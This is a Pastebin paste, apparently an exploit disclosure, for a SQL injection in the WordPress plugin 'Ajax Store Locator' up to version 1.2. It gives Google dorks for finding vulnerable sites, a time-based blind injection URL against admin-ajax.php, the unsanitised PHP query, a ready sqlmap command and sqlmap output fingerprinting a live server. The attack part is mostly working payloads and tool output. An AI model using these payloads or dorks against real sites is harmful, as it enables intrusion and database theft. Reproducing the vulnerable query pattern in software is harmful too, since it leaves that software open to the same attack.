API tools faq
paste
Advertisement
Gh0stTrac3

Wordpress Ajax Store Locator <= 1.2 SQL Injection

Gh0stTrac3
Apr 19th, 2015
236
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.56 KB | None | 0 0
raw download clone embed print report
  1. ######################
  2.  
  3. # Exploit Title : Wordpress Ajax Store Locator <= 1.2 SQL Injection Vulnerability
  4.  
  5. # Vendor Homepage : http://codecanyon.net/item/ajax-store-locator-wordpress/5293356
  6.  
  7. # Software Link : Premium
  8.  
  9. # Dork Google: inurl:ajax-store-locator
  10. # index of ajax-store-locator
  11.  
  12. # Date : 2015-03-29
  13.  
  14. # Tested on : Windows 7 / Mozilla Firefox
  15. # Linux / Mozilla Firefox
  16.  
  17. ######################
  18.  
  19. # Info:
  20.  
  21. The "sl_dal_searchlocation_cbf" ajax function is affected from SQL Injection vulnerability
  22.  
  23. "StoreLocation" var is not sanitized
  24.  
  25. # Exploit:
  26.  
  27. http://TARGET/wordpress/wp-admin/admin-ajax.php?action=sl_dal_searchlocation&funMethod=SearchStore&Location=Social&StoreLocation=1~1 AND (SELECT * FROM (SELECT(SLEEP(10)))LCKZ)
  28.  
  29. StoreLocation's value must contain "~" delimiter
  30.  
  31. $storeLoc = $_REQUEST["StoreLocation"];
  32. ...
  33. ...
  34. $qryVal = explode("~", $storeLoc);
  35. $sql_query = "SELECT a.*,b.*, 0 as ......... LEFT JOIN `$sl_tb_pluginset` as b ON (1=1) WHERE a.id=$qryVal[1]"
  36.  
  37. # PoC sqlmap:
  38.  
  39. sqlmap -u "http://TARGET/wordpress/wp-admin/admin-ajax.php?action=sl_dal_searchlocation&funMethod=SearchStore&Location=Social&StoreLocation=1~1" -p StoreLocation --dbms mysql
  40.  
  41. [18:24:11] [INFO] GET parameter 'StoreLocation' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
  42. for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
  43. [18:24:18] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
  44. [18:24:18] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
  45. [18:24:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
  46. [18:24:29] [INFO] checking if the injection point on GET parameter 'StoreLocation' is a false positive
  47. GET parameter 'StoreLocation' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
  48. sqlmap identified the following injection points with a total of 89 HTTP(s) requests:
  49. ---
  50. Parameter: StoreLocation (GET)
  51. Type: AND/OR time-based blind
  52. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  53. Payload: action=sl_dal_searchlocation&funMethod=SearchStore&Location=Social&StoreLocation=1~1 AND (SELECT * FROM (SELECT(SLEEP(5)))LCKZ)
  54. ---
  55. [18:29:48] [INFO] the back-end DBMS is MySQL
  56. web server operating system: Linux CentOS 5.10
  57. web application technology: PHP 5.3.3, Apache 2.2.3
  58. back-end DBMS: MySQL 5.0.12
  59. ''''''''''''''''''''''''''''''' 11
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!